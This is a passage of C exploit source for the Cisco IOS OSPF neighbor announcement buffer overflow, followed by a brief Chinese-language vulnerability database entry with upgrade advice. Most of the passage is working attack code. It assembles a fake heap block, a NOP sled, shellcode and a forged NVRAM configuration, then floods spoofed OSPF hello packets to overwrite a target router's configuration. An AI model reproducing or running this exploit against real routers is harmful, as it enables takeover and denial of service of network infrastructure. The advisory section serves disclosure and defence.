    u_int32_t		src_mask;
    u_int32_t		area;
    int			directed;
    int			test_only;

    // fake block constants
    int			n_neig;
    int			data_start;
    u_int32_t		blockbegin;
    u_int32_t		prev;
    u_int32_t		nop_sleet;
    u_int32_t		stack_address;
    u_int32_t		iomem_end;

    // other stuff 
    char		*filename;
    int			target_sel;
} cfg;


u_char	*construct_ospf(struct in_addr *dd, struct in_addr *src,
	u_int16_t autosys, int *psize);
int	init_socket_IP4(int broadcast);
int     sendpack_IP4(int sfd, u_char *packet,int plength);
u_int16_t chksum(u_char *data, unsigned long count);
void    *smalloc(size_t size);
void	hexdump(unsigned char *bp, unsigned int length);
void	usage(char *s);

int main(int argc, char **argv) {
    char	option;
    extern char	*optarg;
    int		sfd;

    unsigned int	i=0;
    u_int32_t		countip=20;

    /* confg file */
    int                 fd;
    struct stat         sb;

    u_char              *buffer;
    u_char              *p;
    nvheader_t          *nvh;
    unsigned int        len;
    u_int16_t           cs1;
    
    // final overflow
    char		*overflow;
    int			osize=0;

    
    printf(BLABLA);

    memset(&cfg,0,sizeof(cfg));
    while ((option=getopt(argc,argv,"vDTd:s:n:L:F:f:t:S:a:"))!=EOF) {
	switch (option) {
	    case 'v':	cfg.verbose++;
			break;
	    case 'D':	cfg.directed++;
			break;
	    case 'T':	cfg.test_only++;
			break;
	    case 'd':	cfg.target=(struct in_addr *)smalloc(sizeof(struct in_addr));
			if (inet_aton(optarg,cfg.target)==0) {
			    fprintf(stderr,"Your destination is bullshit\n");
			    return (1);
			}
			break;
	    case 's':	if (inet_aton(optarg,(struct in_addr*)&(cfg.src_net))==0) {
			    fprintf(stderr,"Your source net is wrong\n");
			    return (1);
			}
			break;
	    case 'n':	if (inet_aton(optarg,(struct in_addr*)&(cfg.src_mask))==0) {
			    fprintf(stderr,"Your source mask is wrong\n");
			    return (1);
			}
			break;
	    case 'L':	cfg.n_neig=(unsigned int)strtoul(optarg,(char **)NULL,10);
			break;
	    case 'F':	cfg.data_start=(unsigned int)strtoul(optarg,(char **)NULL,16);
			break;
	    case 'f':	cfg.filename=(char *)smalloc(strlen(optarg)+1);
			strcpy(cfg.filename,optarg);
			break;
	    case 't':	cfg.target_sel=(unsigned int)strtoul(optarg,(char **)NULL,10);
			if (cfg.target_sel>TARGETS) {
			    fprintf(stderr,"Target number unknown\n");
			    return (1);
			}
			break;
	    case 'S':	cfg.nop_sleet=(unsigned int)strtoul(optarg,(char **)NULL,10);
			break;
	    case 'a':	if (inet_aton(optarg,(struct in_addr*)&(cfg.area))==0) {
			    fprintf(stderr,"Your area doesn't make sense.\n");
			    return (1);
			}
			break;
	    default:	usage(argv[0]);
	}
    }

    if (cfg.target_sel>TARGETS) {
	fprintf(stderr,"Error: user too stupid (check -t)\n");
	return (-1);
    }
    if (cfg.n_neig==0) cfg.n_neig=targets[cfg.target_sel].n_neig;
    if (cfg.data_start==0) cfg.data_start=targets[cfg.target_sel].data_start;
    if (cfg.blockbegin==0) cfg.blockbegin=targets[cfg.target_sel].blockbegin;
    if (cfg.prev==0) cfg.prev=targets[cfg.target_sel].prev;
    if (cfg.nop_sleet==0) cfg.nop_sleet=targets[cfg.target_sel].nop_sleet;
    if (cfg.stack_address==0) cfg.stack_address=targets[cfg.target_sel].stack_address;
    if (cfg.iomem_end==0) cfg.iomem_end=targets[cfg.target_sel].iomem_end;

    //
    // Check the parameters and set up a socket
    //
    cfg.src_net=cfg.src_net&cfg.src_mask;

    if ( (cfg.src_net==0)||(cfg.src_mask==0)
	    ||(cfg.filename==NULL)||(cfg.target==NULL)) {
	usage(argv[0]);
    }

    if ((sfd=init_socket_IP4(1))<1) {
	fprintf(stderr,"Could not get a socket for you\n");
	return (-1);
    }

    //
    // Get some info back to the user if he requested verbose
    //
    if (cfg.verbose) {
	if (cfg.directed) 
	    printf("\twith unicast target %s\n",inet_ntoa(*cfg.target));
	else 
	    printf("\twith default destination addresses\n");
	printf("\twith source network %s/",
		inet_ntoa(*(struct in_addr*)&(cfg.src_net)));
	printf("%s\n",inet_ntoa(*(struct in_addr*)&(cfg.src_mask)));
        printf("Using Target: %s\n",targets[cfg.target_sel].description);
	printf( "\t# of neighbors: %u\n"
		"\tdata start    : %u\n"
		"\tBlock address : 0x%08X\n"
		"\tPREV pointer  : 0x%08X\n"
		"\tNOP sleet     : %u\n"
		"\tStack address : 0x%08X\n"
		"\tIO Memory end : 0x%08X\n",
		cfg.n_neig,cfg.data_start,cfg.blockbegin,cfg.prev,
		cfg.nop_sleet,cfg.stack_address,cfg.iomem_end);
    }

    //
    // Patch the fake block with the new values
    //
    bpatch->prev=htonl(cfg.prev);
    bpatch->size=htonl(
	    (cfg.iomem_end
	    -39 // minus block header in bytes - 1
	    -cfg.blockbegin) / 2);
    bpatch->free_next=htonl(cfg.blockbegin+sizeof(fakeblock)-5/* RED ZONE */
	    +((sizeof(nop)-1)*cfg.nop_sleet));
    bpatch->free_prev=htonl(cfg.stack_address);
    bpatch->name=htonl(cfg.blockbegin+44);

    /* 
     * Load Config
     * - load into buffer
     * - prepare NVRAM header
     * - calculate checksum
     * -> *buffer contains payload
     */
    if (cfg.filename==NULL) return (-1);
    if (stat(cfg.filename,&sb)!=0) {
        fprintf(stderr,"Could not stat() file %s\n",cfg.filename);
        return (-1);
    }

    if ((fd=open(cfg.filename,O_RDONLY))<0) {
        fprintf(stderr,"Could not open() file %s\n",cfg.filename);
        return (-1);
    }

    len=sb.st_size;
    if ((buffer=(char *)malloc(len+sizeof(nvheader_t)+10))==NULL) {
        fprintf(stderr,"Malloc() failed\n");
        return (-1);
    }
    memset(buffer,0,len+sizeof(nvheader_t)+10);

    p=buffer+sizeof(nvheader_t);
    if (cfg.verbose) printf("%d bytes config read\n",read(fd,p,len));
    close(fd);

    // pad config so it is word bound for the 0xcafef00d test
    if ((len%2)!=0) {
	strcat(p,"\x0A");
	len++;
	if (cfg.verbose) printf("Padding config by one\n");
    }

    nvh=(nvheader_t *)buffer;
    nvh->magic=htons(0xABCD);		
    nvh->one=htons(0x0001);		// is always one 
    nvh->IOSver=htons(0x0B03);		// IOS version
    nvh->unknown=htonl(0x00000014);	// something, 0x14 just works
    nvh->ptr=htonl(0x000D199F);		// config end ptr 
    nvh->size=htonl(len);

    cs1=chksum(buffer,len+sizeof(nvheader_t)+2);
    if (cfg.verbose) printf("Checksum: %04X\n",htons(cs1));
    nvh->checksum=cs1;

    //
    // Put the overflow together
    //
    // (1) calculate size of the whole thing
    osize=sizeof(fakeblock)-1+
	  (cfg.nop_sleet * (sizeof(nop)-1))+
	  sizeof(ccode)-1+
	  sizeof(nvheader_t)+
	  len+
	  sizeof(terminator)-1;
    if ((osize/4)>cfg.data_start) {
	fprintf(stderr,"ERROR: The whole thing is too large!\n");
	return (-1);
    } else {
	printf("Using %u out of %u bytes (overflow: %u bytes)\n",
		osize,cfg.data_start*4,cfg.n_neig*4);
    }
    //
    // adjust osize ot be 4byte bound
    //
    if ((osize%4!=0)) osize+=osize%4;
    overflow=smalloc(osize);

    //
    // (2) copy the fakeblock in the buffer
    //
    memcpy(overflow,fakeblock,sizeof(fakeblock)-1);
    p=(void *)overflow+sizeof(fakeblock)-1;

    //
    // (3) Add NOPs to the buffer
    //
    for (i=0;i<cfg.nop_sleet;i++) {
	memcpy(p,nop,sizeof(nop)-1);
	p+=sizeof(nop)-1;
    }

    //
    // (4) Add the ccode
    //
    memcpy(p,ccode,sizeof(ccode)-1);
    p+=sizeof(ccode)-1;

    //
    // (5) Add the NVRAM structure and config
    //
    memcpy(p,buffer,len+sizeof(nvheader_t));
    p+=len+sizeof(nvheader_t);

    //
    // (6) finish off with terminator
    //
    memcpy(p,terminator,sizeof(terminator)-1);

    if (cfg.verbose>1) hexdump(overflow,osize);
    if (cfg.test_only) return (0);

    payload=overflow+(osize-4);
    payloadc=osize;

    // *************************
    // PERFORM THE OVERFLOW
    // *************************
    for (i=0;i<cfg.n_neig;i++) {
	u_char		*pack;
	int		plen;
	u_int32_t	uip;

OwnHostException:
	countip++;
	uip=htonl(countip);
	uip=uip&(~cfg.src_mask);
	uip=uip|cfg.src_net;

	if (!memcmp(&uip,cfg.target,IP_ADDR_LEN)) {
	    if (cfg.verbose>2) 
		printf("-- Skipping %s\n",inet_ntoa(*(cfg.target)));
	    else {
		printf("*"); fflush(stdout);
	    }
	    goto OwnHostException;
	}

	if (cfg.verbose>2)
	    printf("\tsending from %15s... ",inet_ntoa(*(struct in_addr*)&(uip)));
	else {
	    printf("."); fflush(stdout);
	}

	// Make and send OSPF
	pack=construct_ospf(cfg.target,
		(struct in_addr *)&uip,0,&plen);
	sendpack_IP4(sfd,pack,plen);
	free(pack);

	if (cfg.verbose>2) printf("\n");
	usleep(1);
    }

    close(sfd);
    printf("\n");

    return 0;
}

u_char	*construct_ospf(struct in_addr *dd, struct in_addr *src,
	u_int16_t autosys, int *psize) {
    u_char			*tpacket;
    iphdr_t			*iph;
    u_int16_t			cs;		/* checksum */
    char			all_ospf[]="224.0.0.5";
    ospf_header_t       	*ospfh;
    ospf_hello_t        	*ohelo;

    *psize=sizeof(iphdr_t)+sizeof(ospf_header_t)+sizeof(ospf_hello_t);
    tpacket=(u_char *)smalloc(*psize
	    +3 /* for my checksum function, which sometimes 
		  steps over the mark */
	    );

    // IP packet
    iph=(iphdr_t *)tpacket;

    iph->version=4;
    iph->ihl=sizeof(iphdr_t)/4;

    iph->tot_len=htons(*psize);
    iph->ttl=IPTTL;
    iph->protocol=IPPROTO_OSPF;

    memcpy(&(iph->saddr.s_addr),&(src->s_addr),IP_ADDR_LEN);
    if (!cfg.directed)
	inet_aton(all_ospf,(struct in_addr *)&(iph->daddr));
    else
	memcpy(&(iph->daddr.s_addr),&(dd->s_addr),IP_ADDR_LEN);

    // OSPF header
    ospfh=(ospf_header_t *)((void *)tpacket+sizeof(iphdr_t));
    ohelo=(ospf_hello_t *)((void *)tpacket+sizeof(iphdr_t)+sizeof(ospf_header_t));
    ospfh->version=2;
    ospfh->type=1;
    ospfh->length=htons(sizeof(ospf_header_t)+sizeof(ospf_hello_t));
    memcpy(&(ospfh->area),&(cfg.area),4);

    // Increment the packets sent
    pc++;

    // 
    // If we are in the range of the whole overflow thingy, copy the appropriate
    // 4 bytes into the source address in the OSPF header
    //
    if ( (pc <= cfg.data_start) && 
	      (pc > cfg.data_start-(payloadc/4) ) ) {
	memcpy(&(ospfh->source),payload,IP_ADDR_LEN);
	payload-=4;
    }
    // 
    // well, we are not in there, so we set it to some value
    //
    else {
	ospfh->source[0]=0xCA;
	ospfh->source[1]=0xFE;
	ospfh->source[2]=0xBA;
	ospfh->source[3]=0xBE;
    }

    // be verbose
    if (cfg.verbose>2) printf(" [0x%08X] ",ntohl(*((unsigned int*)&(ospfh->source))));

    // compile the rest of the packet
    memcpy(&(ohelo->netmask),&(cfg.src_mask),4);
    ohelo->hello_interval=htons(10);
    ohelo->options=0x2;
    ohelo->priority=2;
    ohelo->dead_interval[3]=40;
    memcpy(&(ohelo->designated),&(src->s_addr),IP_ADDR_LEN);

    cs=chksum((u_char *)ospfh,sizeof(ospf_header_t)+sizeof(ospf_hello_t));
    ospfh->checksum=cs;

    return tpacket;
}

// Dirty stuff from IRPAS
int init_socket_IP4(int broadcast) {
    int                 sfd;
    int			t=1;

    if ((sfd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) {
        perror("socket()");
        return(-1);
    }

    /* make a broadcast enabled socket if desired */
    if (broadcast) {
        if (setsockopt(
                    sfd,SOL_SOCKET,SO_BROADCAST,
                    (void *)&t,sizeof(int)) != 0) {
            perror("setsockopt");
            return (-1);
        }
    }
    return sfd;
}

int     sendpack_IP4(int sfd, u_char *packet,int plength) {
    struct sockaddr_in  sin;
    iphdr_t             *iph;

    iph=(iphdr_t *)packet;

    memset(&sin,0,sizeof(struct sockaddr_in));
    sin.sin_family=AF_INET;
    sin.sin_port=htons(0);
    memcpy(&(sin.sin_addr),&(iph->daddr),sizeof(sin.sin_addr));

    if (sendto(sfd,packet,plength,0,
                (struct sockaddr *) &sin,
                sizeof(struct sockaddr_in)) <=0) {
        perror("sendto()");
        return(-1);
    }

    return 0;
}


u_int16_t chksum(u_char *data, unsigned long count) {
    u_int32_t           sum = 0;
    u_int16_t           *wrd;

    wrd=(u_int16_t *)data;
    while( count > 1 )  {
        sum = sum + *wrd;
        wrd++;
        count -= 2;
    }

    if( count > 0 ) sum = sum + ((*wrd &0xFF)<<8);
    while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
    return (~sum);
}

void    *smalloc(size_t size) {
    void        *p;

    if ((p=malloc(size))==NULL) {
        fprintf(stderr,"smalloc(): malloc failed\n");
        exit (-2);
    }
    memset(p,0,size);
    return p;
}


// /dirty 



/* A better version of hdump, from Lamont Granquist.  Modified slightly
 * by Fyodor (fyodor@DHP.com) 
 * obviously stolen by FX from nmap (util.c)*/
void hexdump(unsigned char *bp, unsigned int length) {

  /* stolen from tcpdump, then kludged extensively */

  static const char asciify[] = "................................ !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~.................................................................................................................................";

  register const u_short *sp;
  register const u_char *ap;
  register u_int i, j;
  register int nshorts, nshorts2;
  register int padding;

  printf("\n\t");
  padding = 0;
  sp = (u_short *)bp;
  ap = (u_char *)bp;
  nshorts = (u_int) length / sizeof(u_short);
  nshorts2 = (u_int) length / sizeof(u_short);
  i = 0;
  j = 0;
  while(1) {
    while (--nshorts >= 0) {
      printf(" %04x", ntohs(*sp));
      sp++;
      if ((++i % 8) == 0)
        break;
    }
    if (nshorts < 0) {
      if ((length & 1) && (((i-1) % 8) != 0)) {
        printf(" %02x  ", *(u_char *)sp);
        padding++;
      }
      nshorts = (8 - (nshorts2 - nshorts));
      while(--nshorts >= 0) {
        printf("     ");
      }
      if (!padding) printf("     ");
    }
    printf("  ");

    while (--nshorts2 >= 0) {
      printf("%c%c", asciify[*ap], asciify[*(ap+1)]);
      ap += 2;
      if ((++j % 8) == 0) {
        printf("\n\t");
        break;
      }
    }
    if (nshorts2 < 0) {
      if ((length & 1) && (((j-1) % 8) != 0)) {
        printf("%c", asciify[*ap]);
      }
      break;
    }
  }
  if ((length & 1) && (((i-1) % 8) == 0)) {
    printf(" %02x", *(u_char *)sp);
    printf("                                       %c", asciify[*ap]);
  }
  printf("\n");
}

void usage(char *s) {
    int		i;

    fprintf(stderr,"Usage: \n"
	    "%s -s <src net> -n <src mask> -d <target rtr ip> -f <file>"
		" -t <targ#>\n"
	    "Options:\n"
	    "-s <src net>  Use this network as source (as in target config)\n"
	    "-n <src mask> Use this netmask as source (as in target config)\n"
	    "-d <target>   This is the target router interface IP\n"
	    "-f <file>     Use this as the new config for the router\n"
	    "-t #          Use this target value set (see below)\n"
	    "-a <area>     Use this OSPF area\n"
	    "-v            Be verbose (-vv or -vvv recommended)\n"
	    "-D            Directed attack (unicast) for 11.x targets\n"
	    "-T            Test only - don't send\n"
	    " --- barely used options ---\n"
	    "-L #          Number of neighbors to announce (overflow size)\n"
	    "-F #          Start of data (seen reverse to overflow)\n"
	    "-S #          NOP sleet\n"
	    "\n"
	    "Known targets:\n"
	    ,s);
    
    for (i=0;i<=TARGETS;i++) 
	fprintf(stderr,"\t%s\n",targets[i].description);

    exit (1);
}
		

- 漏洞信息

6455
Cisco IOS OSPF Neighbor Announcement Remote Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Unknown

- 漏洞描述

A remote overflow exists in Cisco IOS. The operating system fails to gracefully handle more than 255 Open Shortest Path First (OSPF) neighbors on an interface, resulting in a buffer overflow. With a specially crafted request, an attacker can cause denial of service, command execution, or manipulate the router's configuration, resulting in a loss of integrity and/or availability.

- 时间线

2003-02-20 Unknow
2003-02-20 Unknow

- 解决方案

Upgrade to version 12.0(19)S, 12.0(19)ST, 12.1(1), 12.1(1)DB, 12.1(1)DC, 12.1(1)T or higher, as this has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站